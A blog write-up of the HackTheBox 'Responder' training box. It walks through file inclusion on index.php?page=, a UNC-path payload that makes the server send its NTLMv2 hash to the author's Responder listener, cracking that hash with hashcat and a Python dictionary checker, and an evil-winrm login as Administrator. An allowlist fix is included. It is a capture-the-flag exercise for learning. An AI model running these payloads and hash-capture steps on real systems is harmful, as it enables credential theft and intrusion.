Virts's Blog ❤️

HackTheBox [Responder] WriteUp


Arbitrary File Inclusion

The first half of this box is mostly answering the guided questions, which are straightforward. The second half, getting the tools to run on macOS, is where it gets fiddly.

First, hit port 80 on the target directly; the response is just a meta-refresh redirect:

virts@Virts-MacMini-M4 ~> curl 10.129.83.22
<meta http-equiv="refresh" content="0;url=http://unika.htb/">

The hostname unika.htb does not resolve anywhere, so you have to map it yourself, either in /etc/hosts or in a local DNS override. I use Surge, which makes this convenient; once the rule is in place the site loads normally.

Directory scanning turns up http://unika.htb/cgi-bin/printenv.pl, a stock CGI script that dumps the server's environment variables. On its own that is a minor information leak, but it reveals the XAMPP install location on disk, which matters in a moment.


The homepage source contains two language links like this:

<a href="/index.php?page=french.html">FR</a>
<a href="/index.php?page=german.html">DE</a>

The page parameter is evidently passed straight to an include, so local file inclusion is likely, and remote file inclusion is possible if the server allows it. Using the XAMPP path leaked by printenv.pl, try http://unika.htb/index.php?page=C:/xampp/cgi-bin/printenv.pl: the script's contents are included and rendered, confirming LFI with an absolute Windows path.
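As an added example (not from the original writeup and not the target's code), the Python below classifies what a raw page= value would make PHP on Windows open, including the //host/share form used in the next section, and shows the allowlist lookup that closes the hole. The web root and the allowlist are assumptions based on the links and paths seen so far.

```python
"""What index.php?page=... asks PHP to open, and an allowlist that prevents it.
Added example for this writeup; not code from the target. The web root and the
allowed page set are constructed assumptions."""
import posixpath
from typing import Optional

ALLOWED_PAGES = {"french.html", "german.html"}   # assumption: the two links in the HTML
WEB_ROOT = "C:/xampp/htdocs"                     # assumption: XAMPP layout leaked by printenv.pl


def classify_page(value: str) -> str:
    """Describe how a bare include($_GET['page']) on Windows would interpret the value."""
    v = value.replace("\\", "/")                 # Windows accepts either separator
    if "://" in v:
        return "url"                 # stream wrapper: only works if allow_url_include=On
    if v.startswith("//"):
        return "unc"                 # \\host\share: the OS opens SMB to host and authenticates
    if len(v) > 1 and v[0].isalpha() and v[1] == ":":
        return "windows-absolute"    # C:/... local file inclusion
    if v.startswith("/"):
        return "posix-absolute"
    if ".." in v.split("/"):
        return "traversal"
    return "relative"


def resolve_page(value: str) -> Optional[str]:
    """Hardened lookup: the parameter must be exactly one allowlisted filename.
    Returns the path to include, or None when the value is rejected."""
    if value not in ALLOWED_PAGES:
        return None
    return posixpath.join(WEB_ROOT, value)


# Constructed probe list: the legitimate values plus the payloads tried in this writeup.
PROBES = [
    "french.html",
    "C:/xampp/cgi-bin/printenv.pl",
    "//10.10.14.17/somefile",
    r"\\10.10.14.17\somefile",
    "http://10.10.14.17/x.txt",
    "../../windows/win.ini",
]


def audit(values=PROBES):
    """Pair each candidate with what PHP would do and whether the allowlist lets it through."""
    return [(v, classify_page(v), resolve_page(v)) for v in values]


if __name__ == "__main__":
    for value, kind, resolved in audit():
        print(f"{value:32} {kind:18} -> {resolved}")
```

The point of the classification is that `//10.10.14.17/somefile` contains neither `../` nor a scheme, so a filter that only blocks traversal or `http://` would let it through; matching the whole value against a fixed set of filenames is the check that actually holds.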


Remote File Inclusion

The next step was new to me: using the inclusion to make the server authenticate to my machine and capture its NTLMv2 hash.

This needs Responder; installation is simple:

git clone https://github.com/lgandx/Responder.git
cd Responder
pip install -r requirements.txt

Responder needs the interface to listen on, and on macOS you also pass that interface's IP with -i. Use the OpenVPN tunnel interface (utun4 here) and your VPN address:

sudo python Responder.py -I utun4 -i 10.10.14.17

Then request http://unika.htb/index.php?page=//10.10.14.17/somefile. PHP on Windows treats //host/share/file as a UNC path and hands it to the OS, which connects to the SMB listener on 10.10.14.17 and authenticates as the account Apache runs under; Responder completes the negotiation and logs the NTLMv2 challenge-response. No http:// wrapper is involved, so this works regardless of the allow_url_include setting.

Save the captured NetNTLMv2 line to a file (test.hash here) and crack it with hashcat in mode 5600 against rockyou:

hashcat -m 5600 test.hash ~/Hack/dict/Dictionary-Of-Pentesting/Password/rockyou.txt
hashcat -m 5600 test.hash ~/Hack/dict/Dictionary-Of-Pentesting/Password/rockyou.txt --show
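To show what mode 5600 is actually recomputing for every candidate, here is an added Python example (not from the writeup, Responder or hashcat) that rebuilds a NetNTLMv2 response from a password and runs a dictionary check against a hashcat-format line. The user name, domain, challenge, blob and wordlist are constructed stand-ins, not values captured from the box; MD4 is implemented inline because hashlib's md4 is missing on many OpenSSL 3 builds.

```python
"""NetNTLMv2 (hashcat -m 5600) reconstruction: the check a cracker runs per candidate.
Added example for this writeup; not part of Responder or hashcat. The capture below is
constructed from a known password so the round trip can be verified offline."""
import hashlib
import hmac
import struct
from typing import Optional

MASK32 = 0xFFFFFFFF


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); needed because hashlib.new('md4') often fails."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = [
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19),
         list(range(16))),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         [(i % 4) * 4 + i // 4 for i in range(16)]),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    ]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, k, shifts, order in rounds:
            for i, j in enumerate(order):
                a = _lrot((a + f(b, c, d) + x[j] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c   # rotate so the next step updates the old d
        h = [(v + w) & MASK32 for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def ntlmv2_response(password: str, user: str, domain: str,
                    server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(HMAC-MD5(NT, upper(user)+domain), server_challenge || blob)."""
    ident = (user.upper() + domain).encode("utf-16-le")
    ntlmv2_key = hmac.new(nt_hash(password), ident, hashlib.md5).digest()
    return hmac.new(ntlmv2_key, server_challenge + blob, hashlib.md5).digest()


def build_blob(client_challenge: bytes, timestamp: int, nb_domain: str) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE with a single MsvAvNbDomainName AV pair and terminator."""
    name = nb_domain.encode("utf-16-le")
    target_info = struct.pack("<HH", 0x0002, len(name)) + name + struct.pack("<HH", 0, 0)
    return (b"\x01\x01\x00\x00" + b"\x00" * 4 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def to_5600(user: str, domain: str, server_challenge: bytes, proof: bytes, blob: bytes) -> str:
    """hashcat mode 5600 line: USER::DOMAIN:challenge:NTProofStr:blob (all hex)."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def parse_5600(line: str):
    user, _, rest = line.partition("::")
    domain, chal, proof, blob = rest.split(":", 3)
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def check_password(line: str, candidate: str) -> bool:
    user, domain, chal, proof, blob = parse_5600(line)
    return hmac.compare_digest(ntlmv2_response(candidate, user, domain, chal, blob), proof)


def crack(line: str, wordlist) -> Optional[str]:
    """Dictionary attack: the same loop hashcat runs over rockyou, only far slower."""
    for word in wordlist:
        if check_password(line, word):
            return word
    return None


# Constructed capture (domain, challenge, timestamp and blob are made up for the example).
_CHALLENGE = bytes.fromhex("1122334455667788")
_BLOB = build_blob(bytes.fromhex("8899aabbccddeeff"), 0x01D9C0FFEE000000, "UNIKA")
SAMPLE_LINE = to_5600("Administrator", "UNIKA", _CHALLENGE,
                      ntlmv2_response("badminton", "Administrator", "UNIKA", _CHALLENGE, _BLOB),
                      _BLOB)
WORDLIST = ["123456", "password", "Badminton", "badminton"]   # constructed stand-in for rockyou

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, WORDLIST))
```

Two things the derivation makes visible: the user name is uppercased before keying but the domain is used as captured, so a line with the wrong domain field will never crack; and what Responder logged is a challenge-response, not the NT hash, so it cannot be passed-the-hash and has to be cracked (or relayed) to be useful.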

The cracked password is badminton.

A port scan of the target shows 5985 open. That is WinRM (Windows Remote Management over HTTP), the Windows remote-shell service; in role it is the rough equivalent of SSH on Linux, and with a valid password it gives an interactive PowerShell session.

However, after a long search I could not find a suitable WinRM client for macOS, so I ended up installing evil-winrm myself (it is a Ruby gem, hence the Ruby setup below).

# Install Ruby package management tool
brew install rbenv ruby-build
# Install Ruby version 3.2.2
rbenv install 3.2.2
# Edit config.fish
vim ~/.config/fish/config.fish

Since I am using fish shell, I need to modify the fish shell configuration file and add the following content to the file:

# rbenv initialization
set -gx PATH $HOME/.rbenv/bin $PATH
# Initialize rbenv, fish version
status --is-interactive; and source (rbenv init -|psub)

Reload the configuration, pin the Ruby version, and install the gem:

source ~/.config/fish/config.fish
rbenv global 3.2.2
gem install evil-winrm

Use evil-winrm to log in to the target with the cracked password and read the flag:

evil-winrm -i 10.129.237.174 -u Administrator -p badminton
type "C:/Users/mike/Desktop/flag.txt"

Successfully obtained the Flag.
